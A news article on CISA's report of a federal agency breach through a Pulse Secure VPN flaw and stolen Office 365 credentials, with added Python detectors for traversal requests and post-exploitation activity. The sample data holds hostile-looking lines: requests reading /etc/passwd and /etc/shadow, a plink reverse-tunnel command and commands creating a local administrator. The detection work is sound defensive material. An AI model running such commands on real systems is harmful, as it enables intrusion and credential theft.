Federal Agency Hacked Using Stolen Office 365 Credentials
CISA: Hacker Apparently Exploited VPN Vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency has issued a report describing how a threat actor apparently used a well-known VPN vulnerability and compromised Office 365 credentials to gain administrative privileges to a federal agency’s network.
The CISA report, which does not identify the agency, says a highly skilled malicious actor implanted a "sophisticated multistage malware that evaded the affected agency's anti-malware protection and gained persistent access through two reverse Socket Secure proxies that exploited weaknesses in the agency's firewall."
The report does not attribute the attack or say when it occurred. The malware used was capable of exfiltrating data, CISA says, but it does not make clear if data, indeed, was stolen.
Adam Kujawa, director of Malwarebytes Labs, says the hacker likely scoped out the federal agency for some time before the intrusion.
"While much of their operations were hidden due to the use of an SSH connection to a virtual private server, I have to assume that, considering their efforts to find additional VPN passwords, this attack itself may have been for the purpose of information gathering and/or establishing a foothold on this network, rather than any specific form of disruption," Kujawa tells Information Security Media Group.
The hacker will likely use the data gleaned from this breach to attack the same network, or a connected one, again, Kujawa says.
CISA was alerted to the situation through Einstein, the Department of Homeland Security's intrusion detection system that monitors federal civilian networks. CISA launched an immediate investigation to confirm the tactics, techniques and procedures the hackers used and verify the indicators of compromise.
The malicious actor gained a toehold in the federal system using legitimate Office 365 credentials, CISA says. Although CISA has not yet verified how these credentials were obtained, it theorizes that the hacker may have harvested them by exploiting a well-known vulnerability - CVE-2019-11510 - in a Pulse Secure VPN server.
"The difficulty is that once a valid credential has been compromised, all subsequent access using that credential will appear normal,” says Ed Amoroso, CEO at the cybersecurity research and consulting firm TAG Cyber. “This is why it takes so much time for systems like Einstein to detect an anomaly by the intruder - and sometimes these systems never detect anything, especially if the adversary is really good."
If exploited, the CVE-2019-11510 vulnerability enables an unauthenticated remote attacker to send a specially crafted URL and read arbitrary files from the appliance, which allows the theft of passwords, according to the National Institute of Standards and Technology.
"CISA has observed wide exploitation of CVE-2019-11510 across the federal government," its report says, noting Pulse Secure issued a patch for this flaw in April 2019.
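Because the flaw is an unauthenticated arbitrary file read triggered by a crafted URL, the request itself is visible in the appliance's or reverse proxy's web access log. The detector below, an added example that is not code from CISA or the article, decodes each request path (including double URL-encoding), walks its segments, and flags any request whose path climbs above the web root; a 200 response to such a request means the read most likely succeeded. The log lines are constructed in Apache "combined" format for illustration; the traversal URIs in them are placeholders and are not the actual CVE-2019-11510 request.

```python
"""Flag directory-traversal / arbitrary-file-read attempts in web access logs.

Added example, not part of the CISA report or the article. SAMPLE_LOG is
constructed; the traversal URIs are illustrative, not the real exploit URI.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache "combined" log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2020:01:12:03 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2020:01:12:09 +0000] "GET /portal/..%2F..%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 1830 "-" "python-requests/2.24"
198.51.100.23 - - [10/Sep/2020:01:12:11 +0000] "GET /portal/%252e%252e/%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 200 950 "-" "python-requests/2.24"
203.0.113.7 - - [10/Sep/2020:01:13:40 +0000] "GET /dana/home/index.cgi?x=../static/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Sep/2020:01:14:02 +0000] "GET /dana-na/../dana-na/css/ds.css HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Enough of the combined format to get source IP, timestamp, request and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) '
)


def full_decode(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so %252e%252e (double-encoded '..') is caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def escapes_root(path: str) -> bool:
    """True if the path's '..' segments ever climb above the web root.

    Unlike posixpath.normpath, which silently clamps '/..' to '/', this keeps
    the depth counter so '/portal/../../x' is reported while
    '/a/../a/b' (which never leaves the root) is not.
    """
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def find_traversal(log_text: str) -> list:
    """Return one finding per request whose (decoded) path escapes the root."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Only the path is checked; traversal inside a query string is left
        # to application-specific rules (line 4 of the sample is benign here).
        path = m["uri"].split("?", 1)[0]
        decoded = full_decode(path)
        if escapes_root(decoded):
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "uri": m["uri"],
                "decoded": decoded,
                "status": int(m["status"]),
                # A 200 means the server most likely served the file.
                "severity": "high" if m["status"] == "200" else "medium",
            })
    return findings


def suspects_by_ip(findings: list) -> Counter:
    """Count traversal attempts per source IP for triage."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = find_traversal(SAMPLE_LOG)
    for h in hits:
        print(f'{h["severity"]:6} {h["ip"]:15} {h["status"]} {h["decoded"]}')
    print(suspects_by_ip(hits))
```

Run against the real appliance or reverse-proxy log; any source that produces repeated high-severity hits should be treated as having read server-side files, and every credential the appliance stored should be considered exposed, which is the scenario CISA describes.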
Office 365 Connection
The attacker, who gained administrative-level privileges, was able to perform a discovery operation into the agency's Office 365 account, where the hacker accessed help desk email attachments with subject lines of "intranet access" and "VPN passwords," according to CISA.
"The actor logged into the same email account via Remote Desktop Protocol from IP address 207.220.1[.]. The actor enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy," CISA says. "Immediately afterward, the threat actor used common Microsoft Windows command line processes - conhost, ipconfig, net, query, netstat, ping, and whoami, plink.exe - to enumerate the compromised system and network."
Persistence and command-and-control were established on the network by:
- Creating a persistent Secure Shell (SSH) tunnel/reverse SOCKS proxy;
- Running inetinfo.exe - a unique, multistage malware used to drop files;
- Setting up a locally mounted remote share at IP address 78.27.70[.]237 (Proxy [T1090]).
"This attack is almost old school,” Kujawa says. “The malware utilized to create persistence is barely more than a reverse shell and command-line script. Having an attacker manually infiltrate a network and launch malware is a huge difference from malware designed to infect systems on their own."
With the administrative-level privileges, the attacker created a local account from which it collected and exfiltrated data, CISA says. Malicious activities included browsing directories, copying files, connecting to the command-and-control server and exfiltrating data in zip archives.
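Three of the behaviors reported above leave a footprint in ordinary process-creation telemetry: the burst of built-in discovery commands (ipconfig, net, query, netstat, ping, whoami) from one session, plink.exe launched with reverse-tunnel or dynamic-SOCKS flags to build the SSH tunnel/reverse SOCKS proxy, and a local account being created and elevated with net.exe. The hunt below is an added example, not code from CISA or the article; it runs over constructed Sysmon Event ID 1 / Security 4688 style records, and the hostnames, user names, paths and IP address in them are placeholders.

```python
"""Hunt rules for the post-exploitation pattern above, over process-creation
telemetry. Added example, not code from CISA or the article. EVENTS is
constructed Sysmon/4688-style data; names, hosts and IPs are placeholders.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Built-in Windows tools that are individually harmless but, fired in quick
# succession from one session, look like hands-on-keyboard reconnaissance.
DISCOVERY_TOOLS = {
    "ipconfig.exe", "net.exe", "net1.exe", "query.exe", "quser.exe",
    "netstat.exe", "ping.exe", "whoami.exe", "nltest.exe", "systeminfo.exe",
    "tasklist.exe",
}

# Constructed events: one attacker session on WS-0421, benign noise on WS-0300.
EVENTS = [
    {"ts": "2020-09-10T02:00:01", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Windows\\System32\\whoami.exe", "cmdline": "whoami /all"},
    {"ts": "2020-09-10T02:00:04", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Windows\\System32\\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"ts": "2020-09-10T02:00:09", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Windows\\System32\\net.exe", "cmdline": 'net group "Domain Admins" /domain'},
    {"ts": "2020-09-10T02:00:15", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Windows\\System32\\query.exe", "cmdline": "query user"},
    {"ts": "2020-09-10T02:00:21", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Windows\\System32\\netstat.exe", "cmdline": "netstat -ano"},
    {"ts": "2020-09-10T02:00:30", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Windows\\System32\\ping.exe", "cmdline": "ping -n 1 dc01"},
    {"ts": "2020-09-10T02:01:10", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Users\\Public\\plink.exe",
     "cmdline": "plink.exe -ssh -batch -N -R 8080:127.0.0.1:3389 user@198.51.100.23"},
    {"ts": "2020-09-10T02:03:02", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net user svc_backup /add"},
    {"ts": "2020-09-10T02:03:09", "host": "WS-0421", "user": "AGENCY\\svc_helpdesk",
     "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net localgroup administrators svc_backup /add"},
    {"ts": "2020-09-10T02:10:00", "host": "WS-0300", "user": "AGENCY\\jdoe",
     "image": "C:\\Windows\\System32\\ipconfig.exe", "cmdline": "ipconfig"},
    {"ts": "2020-09-10T02:11:00", "host": "WS-0300", "user": "AGENCY\\jdoe",
     "image": "C:\\Windows\\System32\\ping.exe", "cmdline": "ping printer01"},
]


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def discovery_bursts(events, window=timedelta(minutes=10), threshold=5):
    """One alert per (host, user) that runs >= threshold distinct discovery
    tools inside a sliding window."""
    by_session = defaultdict(list)
    for e in events:
        tool = basename(e["image"])
        if tool in DISCOVERY_TOOLS:
            by_session[(e["host"], e["user"])].append((datetime.fromisoformat(e["ts"]), tool))
    alerts = []
    for (host, user), items in by_session.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            tools = {t for ts, t in items[i:] if ts - start <= window}
            if len(tools) >= threshold:
                alerts.append({"rule": "discovery_burst", "host": host, "user": user,
                               "start": start.isoformat(), "tools": sorted(tools)})
                break  # report each session once
    return alerts


def reverse_tunnels(events):
    """plink.exe with -R (remote forward) or -D (dynamic SOCKS): an SSH tunnel
    or reverse SOCKS proxy back to the operator's host."""
    alerts = []
    for e in events:
        if basename(e["image"]) != "plink.exe":
            continue
        toks = e["cmdline"].split()
        flags = sorted(t for t in toks if t in ("-R", "-D", "-L", "-N", "-pw"))
        if "-R" in flags or "-D" in flags:
            alerts.append({"rule": "plink_reverse_tunnel", "host": e["host"], "user": e["user"],
                           "flags": flags,
                           "remote": next((t for t in toks if "@" in t), None),
                           "cmdline": e["cmdline"]})
    return alerts


def account_changes(events):
    """net user <name> /add or net localgroup <group> <name> /add."""
    alerts = []
    for e in events:
        if basename(e["image"]) not in ("net.exe", "net1.exe"):
            continue
        toks = [t.lower() for t in e["cmdline"].split()]
        if "/add" in toks and len(toks) >= 3 and toks[1] in ("user", "localgroup"):
            alerts.append({"rule": "net_account_change", "host": e["host"], "user": e["user"],
                           "object": toks[2], "cmdline": e["cmdline"]})
    return alerts


def hunt(events):
    return discovery_bursts(events) + reverse_tunnels(events) + account_changes(events)


if __name__ == "__main__":
    for a in hunt(EVENTS):
        print(a)
```

The burst rule is deliberately session-scoped (host plus user) rather than host-scoped, so a help-desk technician's normal ipconfig on one workstation does not merge with an attacker's session elsewhere; tune the window and threshold to the environment before alerting on it. The plink rule keys on the tool's own flags, so a renamed binary evades it; pairing it with a file-hash or original-filename check on the image closes that gap.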
The CISA report contains several risk mitigation recommendations, including: deploying multifactor authentication, keeping administrative accounts on separate workstations, implementing least privilege access and securing RDP connections.